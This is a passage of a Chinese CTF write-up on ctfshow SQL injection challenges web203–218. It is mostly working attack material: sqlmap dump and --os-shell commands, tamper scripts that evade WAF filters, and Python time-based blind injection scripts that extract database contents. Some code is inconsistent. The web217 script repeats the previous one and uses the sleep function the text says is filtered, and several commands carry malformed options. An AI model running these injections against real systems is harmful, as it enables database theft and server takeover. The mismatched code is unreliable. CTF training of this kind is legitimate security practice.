   //代码过于简单,不宜展示
  }

解题思路

使用–method 调整sqlmap的请求方式

EXP

sqlmap -u http://b96c710e-fe78-4aaf-a19c-c45338e228cf.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --dbms=mysql -D ctfshow_web -T ctfshow_user -C pass --dump

web204

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

cookie

EXP

sqlmap -u http://79f7214f-8734-406b-b4ef-e641adf16c46.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --dbms=mysql -D ctfshow_web -T ctfshow_user -C pass --dump --cookie="PHPSESSID=bdu0d5n7fqvh0n792j4inaomld;ctfshow=d739287c1b860e51896e2a2fa728baf0"

web205

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

api调用需要鉴权,不知道是啥,不懂得去百度

EXP

sqlmap -u http://3b31b28c-6b13-4cd5-b9eb-59a27ba95fa0.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_flax -C flagx --dump  --headers="Content-Type: text/plain" --safe-url=http://3b31b28c-6b13-4cd5-b9eb-59a27ba95fa0.challenge.ctf.show/api/getToken.php --safe-freq=1

web206

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

sqlmap会自己判断闭合,和上面一样做就行

EXP

sqlmap -u http://3f019c71-0464-4492-803f-fe8d758be0d4.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_flaxc -C flagv --dump  --headers="Content-Type: text/plain" --safe-url=http://3f019c71-0464-4492-803f-fe8d758be0d4.challenge.ctf.show/api/getToken.php --safe-freq=1

web207

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对传入的参数进行了过滤
  function waf($str){
   return preg_match('/ /', $str);
  }

解题思路

开始教你使用tamper,同时题目过滤了空格,tamper是sql自带的绕过waf的功能,其中有一个是space2comment.py 用/**/代替空格

EXP

sqlmap -u http://39ffb7ca-22b0-4fa8-9ba5-d5fd7ddf513a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_flaxca -C flagvc --dump  --headers="Content-Type: text/plain" --safe-url=http://39ffb7ca-22b0-4fa8-9ba5-d5fd7ddf513a.challenge.ctf.show//api/getToken.php --safe-freq=1 --tamper space2comment

web208

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对传入的参数进行了过滤
// $id = str_replace('select', '', $id);
  function waf($str){
   return preg_match('/ /', $str);
  }

解题思路

这题又新加了一个把select消掉的waf,所以还要再加一个tamper,randomcomments.py 用/**/分割sql关键字

EXP

sqlmap -u http://3be8680c-a746-45f7-9524-a687d085850c.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_flaxcac -C flagvca --dump  --headers="Content-Type: text/plain" --safe-url=http://3be8680c-a746-45f7-9524-a687d085850c.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper="randomcase.py,space2comment.py"

web209

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对传入的参数进行了过滤
  function waf($str){
   //TODO 未完工
   return preg_match('/ |\*|\=/', $str);
  }

解题思路

过滤了等于号和星号,这题开始要自己搓tamper了,过滤了等于号可以用like代替,直接在space2comment.py里按照原本的格式改就行了,同时过滤了型号,要把原本的tamper的空格替换改成其他的

EXP

sqlmap -u http://dd71ce86-d055-4875-a491-287d1fdf75dc.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql -D ctfshow_web -T ctfshow_flav -C ctfshow_flagx --dump --headers="Content-Type: text/plain" --safe-url=http://dd71ce86-d055-4875-a491-287d1fdf75dc.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper space2comment

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '*':
                retVal += chr(0x31)
                continue
            elif payload[i] == '=':
                retVal += chr(0x0a)+"like"+chr(0x0a)
                continue
                
            elif payload[i] == '"':
                doublequote = not doublequote
                
            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue

            retVal += payload[i]
    return retVal

web210

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }

解题思路

先看一眼代码,先对传入的数据b64解码,然后反转字符,再解码,再反转,那么我们要改的tamper就是要把payload先反转,再编码,然后反转再编码

EXP

sqlmap -u http://5432fae2-84ab-4474-b554-d08a5a73734d.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql -D ctfshow_web -T ctfshow_flavi -C ctfshow_flagxx --dump --headers="Content-Type: text/plain" --safe-url=http://5432fae2-84ab-4474-b554-d08a5a73734d.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper space2comment.py

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload
    retVal = base64.b64encode(retVal[::-1])
    retVal = base64.b64encode(retVal[::-1])
    return retVal

web211

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ /', $str);
}

解题思路

和上题一样,但是同时又对空格进行了过滤,所以要再上题的基础上替换空格

EXP

sqlmap -u http://8c4c63d8-44c8-46fa-af6a-e38917af77d2.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql  -D ctfshow_web -T ctfshow_flavia -C ctfshow_flagxxa --dump --headers="Content-Type: text/plain" --safe-url=http://8c4c63d8-44c8-46fa-af6a-e38917af77d2.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper space2comment.py

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/**/"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/**/"
                continue

            retVal += payload[i]
    retVal = base64.b64encode(retVal[::-1])
    retVal = base64.b64encode(retVal[::-1])
    return retVal

web212

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ |\*/', $str);
}

解题思路

把前面几题写的结合一下就行

EXP

sqlmap -u http://882da072-a9d3-4603-b2ee-db3be196e211.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show -D ctfshow_web -T ctfshow_flavis -C ctfshow_flagxsa --dump --headers="Content-Type: text/plain" --safe-url=http://882da072-a9d3-4603-b2ee-db3be196e211.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper space2comment.py

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote
            elif payload[i] == '*':
                retVal+=chr(0x31)
                continue
            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue

            retVal += payload[i]
    retVal = base64.b64encode(retVal[::-1])
    retVal = base64.b64encode(retVal[::-1])
    return retVal

web213

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ |\*/', $str);
}

解题思路

过滤词和上题一样,但要求你用-os-shell来getshell

EXP

sqlmap -u http://a882438c-4164-4d6c-b485-af1a4946c0c1.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --os-shell --headers="Content-Type: text/plain" --safe-url=http://a882438c-4164-4d6c-b485-af1a4946c0c1.challenge.ctf.show/api/getToken.php  --safe-freq=1 --tamper space2comment.py

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote
            elif payload[i] == '*':
                retVal+=chr(0x31)
                continue
            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue

            retVal += payload[i]
    retVal = base64.b64encode(retVal[::-1])
    retVal = base64.b64encode(retVal[::-1])
    return retVal

web214

题目源码

//无
//屏蔽危险分子

解题思路

这题连个鸡掰都没给,看一下答案说是要看主页流量的select.js在这里面发现ip和debug的post传参,试了一下发现ip=sleep(3)&&debug=0可以执行,所以可以利用这个进行时间盲注

EXP

import requests
url='http://3535ec17-a5bd-482a-b325-99a78eb68394.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(0,128):
        #payload=f"if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},sleep(2),0)"
        #payload=f"if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{i},1))={j},sleep(2),0)#"
        payload=f"if(ascii(substr((select flaga from ctfshow_flagx),{i},1))={j},sleep(2),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=2)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

web215

题目源码

//用了单引号
//屏蔽危险分子

解题思路

用了单引号,那就要先闭合再搞

EXP

import requests
url='http://5fd5b376-28a1-4832-9fc2-bec290ec6625.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(0,128):
        #payload=f"1' or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},sleep(2),0)#"
        #payload=f"1' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{i},1))={j},sleep(2),0)#"
        payload=f"1' or if(ascii(substr((select flagaa from ctfshow_flagxc),{i},1))={j},sleep(2),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=2)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

web216

题目源码

where id = from_base64($id);
//屏蔽危险分子

解题思路

用括号闭合base64,然后继续

EXP

import requests
url='http://6ef16676-3e80-43da-bbe6-13754ed71f0e.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(32,128):
        #payload=f"'NjY2') or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},sleep(2),0)#"
        #payload=f"'NjY2') or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxcc'),{i},1))={j},sleep(2),0)#"
        payload=f"'NjY2') or if(ascii(substr((select flagaac from ctfshow_flagxcc),{i},1))={j},sleep(2),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=2)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

web217

题目源码

where id = ($id)
    //屏蔽危险分子
    function waf($str){
        return preg_match('/sleep/i',$str);
    }

解题思路

过滤了sleep,可以用benchmark绕过,不能无脑拉大数字,而且加个time.sleep延迟,不然网址卡爆没法出结果

EXP

import requests
url='http://6ef16676-3e80-43da-bbe6-13754ed71f0e.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(32,128):
        #payload=f"'NjY2') or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},sleep(2),0)#"
        #payload=f"'NjY2') or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxcc'),{i},1))={j},sleep(2),0)#"
        payload=f"'NjY2') or if(ascii(substr((select flagaac from ctfshow_flagxcc),{i},1))={j},sleep(2),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=2)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

web218

题目源码

where id = ($id)
    //屏蔽危险分子
    function waf($str){
        return preg_match('/sleep|benchmark/i',$str);
    }

解题思路

过滤了benchmark,可以用其他方法拖时间

EXP

import requests
import time
url='http://d10b5a86-5d3e-4c29-a5ea-cfa81bcb7f09.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(32,128):
        #payload=f"1) or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},(select count(*) from information_schema.columns A,information_schema.columns B),0)#"
        #payload=f"1) or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{i},1))={j},(select count(*) from information_schema.columns A,information_schema.columns B),0)#"
        payload=f"1) or if(ascii(substr((select flagaaC from ctfshow_flagxc),{i},1))={j},(select count(*) from information_schema.columns A,information_schema.columns B),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=0.6)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

待续

久而不念
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4428
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
ctfshow-web入门-sql注入-web171
HkD01L的博客
11-22 299
此题为 【从0开始学web】系列第一百七十一题 此系列题目从最基础开始,题目遵循循序渐进的原则 从此题开始的150道题全部为sql注入,准备好了吗?
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4635
ctfshow 靶场 web入门 sql注入系列
ctfshow-web入门-sql注入web191-web195)
最新发布
Welcome To Myon'Blog !
08-07 978
我们不指定第三个参数,就可以实现和 left 和 right 一样的效果。密码只能是数字,过滤了空格,采用反引号包裹绕过,题目已经说了是堆叠注入,这里直接修改用户名和密码:
CTFshow-WEB入门-SQL注入(中)
feng的博客
02-08 1859
web199 很懵。。。把括号给过滤了,所以varchar(255)就不能用了,考虑改成其他的类型,但是不知道到底哪里出了问题,每次一改不是没效果,就是查不出来东西。一旦alter出错就要重新启容器,很烦。 看了一下y4师傅的姿势,服了 1;show tables; ctfshow_user 对,最简单的方法,一直都没想起来,我太菜了。。。 web200 同上 web201 开始学习sqlmap的使用。 sqlmap的使用手册:sqlmap 不过因为是纯英文,英文太菜的我肯定看不太懂,不过也不需要多深入的
ctfshow- sql注入(web入门
..
11-19 1880
web174 这道题可以先在查询框中随便查询1或2或3,发现没有回显,猜测一下可能是盲注。 首先用bp抓包试一下,得到关键信息 http://f5096abc-7db4-4448-8da0-fccd604899d9.challenge.ctf.show/api/v3.php?id=11&page=1&limit=10 用脚本尝试一下没有回显信息,根据前面的经验,这是第四题尝试改为v4.php?id=1,发现出现回显信息。 我们可以这样写脚本 import r.
ctfshow-web入门-sql
qq_43618536的博客
07-10 995
ctfshow-web入门-sql
ctfshow web入门 sql注入做题记录
ashMOB的博客
11-12 1066
ctfshow web入门 sql注入 前言,感谢y4师傅详尽的教程[CTFSHOW]SQL注入(WEB入门)_Y4tacker的博客-CSDN博客_ctfshow sql注入 sql注入的产生: php中对数据库的操作非常简化,只需要一串sql语句的字符串,之后将这个字符串传入mysql_query这个函数就能进行数据库的操作,因而如果对用户传入的参数不进行严格的过滤,或者通过预处理之类的手段严格限制传入的参数,就会造成sql注入漏洞,执行用户自定义的sql语句。 MySQL5注入的一般流程: 获取字
[CTFSHOW][WEB入门] SQL注入
fallingskies
10-07 985
web171 参数类型 字符型 SQL语句 SELECT 注入方式 回显注入 查询语句 //拼接sql语句查找指定ID用户 $sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;"; # 确定回显列数 -1' union select NULL,NULL,NULL--+ # 查询当...
CTFshow sql注入 上篇(web221-253)
Kradress的博客
04-20 4732
目录前言思路题解总结 前言 输入源码 思路 ################################ 题解 ################################ 总结 …
CTFshow_web入门_sql注入wp
monster663的博客
02-22 1142
web171 150题,准备好了吗? 1' or 1=1--+ web172 无过滤直接注,这里演示一下比较整的注入过程,#后面表示回显结果 1' or 1=1--+ 测试注入点 1' order by 2--+ 测试列数 1' union select 1,2--+ 回显 1' union select 1,(select group_concat(schema_name) from information_schema..
CTFSHOW-WEB入门-SQL注入
qq_44657899的博客
05-29 9159
文章目录前言web171web172web173web174web175 前言 最近发现对sql注入的相关知识点有点生疏和忘记了,做做ctfhshow的sql注入来巩固和学习一些新姿势。 web171 直接union注入即可 # 判断列数 ' order by 3 --+ # 查数据库名 ' union select 1,2,database() --+ # 查表名 ' union select 1,2,concat(table_name) from information_schema.tables
[CTFSHOW]SQL注入(WEB入门)
热门推荐
Y4tacker的博客
11-25 1万+
文章目录前言新手区web171web172web173web174 前言 看大家好像挺需要的所以在这里记录一下自己的脚本和payload,不做思路讲解,除非题目比较骚 新手区 可以看看我以前记录的小笔记 SQL注入之MySQL注入的学习笔记(一) SQL注入之MySQL注入学习笔记(二) web171 比较常规的题目不做讲解了,这里给出payload # 查数据库 payload = "-1'union select 1,2,group_concat(table_name) from information
CTFshow——web入门——sql注入
h_adam的博客
03-14 6604
web入门——sql注入基础知识点判断是否注入order by 判断列数web171web172web173 基础知识点 判断是否注入 使用注释符–+ +代表的是空格 或者使用%23来做注释符 1' and 1=1%23 order by 判断列数 order by 是根据某一列进行排序 使用 1' order by 3--+ 返回正常 1' order by 4--+ 没有数据 说明列数是3 web171 本地测试,查询id为id = '9999' or id='3',9999不存在时会查询id=3
ctfshow web 入门 sql注入
wsitcj的博客
02-23 270
171、常规题型(需要把前面数字换为-1,注释用 --+) 查数据库 payload = “-1’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+” 查列名 payload="-1’union select 1,2,group_concat(column_name) from information_schema.columns where ta
ctfshow ,web入门sql注入
jie_a的博客
05-29 199
芜湖,刚刚考科目三,又是开始学习的一天 web184 之前的懒得重新写了, 这里用"right join"右连接来把两个表连接起来进行查询pass字段,后面的单引号可以用16进制编码绕过 RIGHT JOIN(右连接) 用于获取右表所有记录,即使左表没有对应匹配的记录 过滤了where 所以我们用 on 过滤了单引号 所以我们用char(99) =c char表 :char表 回显43; 然后我们写个脚本 import requests url='http://1f6a8d55-3dd2-4924-a
ctfshow web入门 sql注入
HoAd'blog
02-10 703
ctfshow web入门 sql注入 171 正常的手工注入过程 查数据库 1' union select 1,database(),3-- - 查表名 1' union select 1,table_name,3 from information_schema.tables where table_schema=database() -- - 查列名 1' union select 1,column_name,3 from information_schema.columns where table
sql注入_union注入 ctfshow web入门 sql注入
sugar_by的博客
06-02 549
web 171 查询有多少列 查询库名 查询ctfshow_web库的表 合并查询当前库的表 查询表列名 查询表中的内容 web 172 查看有多少列 查询当前数据库的表 查询ctfshow_user2的列 查询数据(只要不查username就行) web 173 返回逻辑preg_match函数进行正则表达式表达式的匹配,成功返回1,否则返回0 参数i表示不区分大小写 json_encode函数将返回值变成json码 查询有多少列 查看当前数据库 查询表的数据 发现没有有用的信息 查看
ctfshow-WEB入门-Part1-wp
F1rstb100d
09-02 349
ctfshow-WEB入门-Part1-wp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值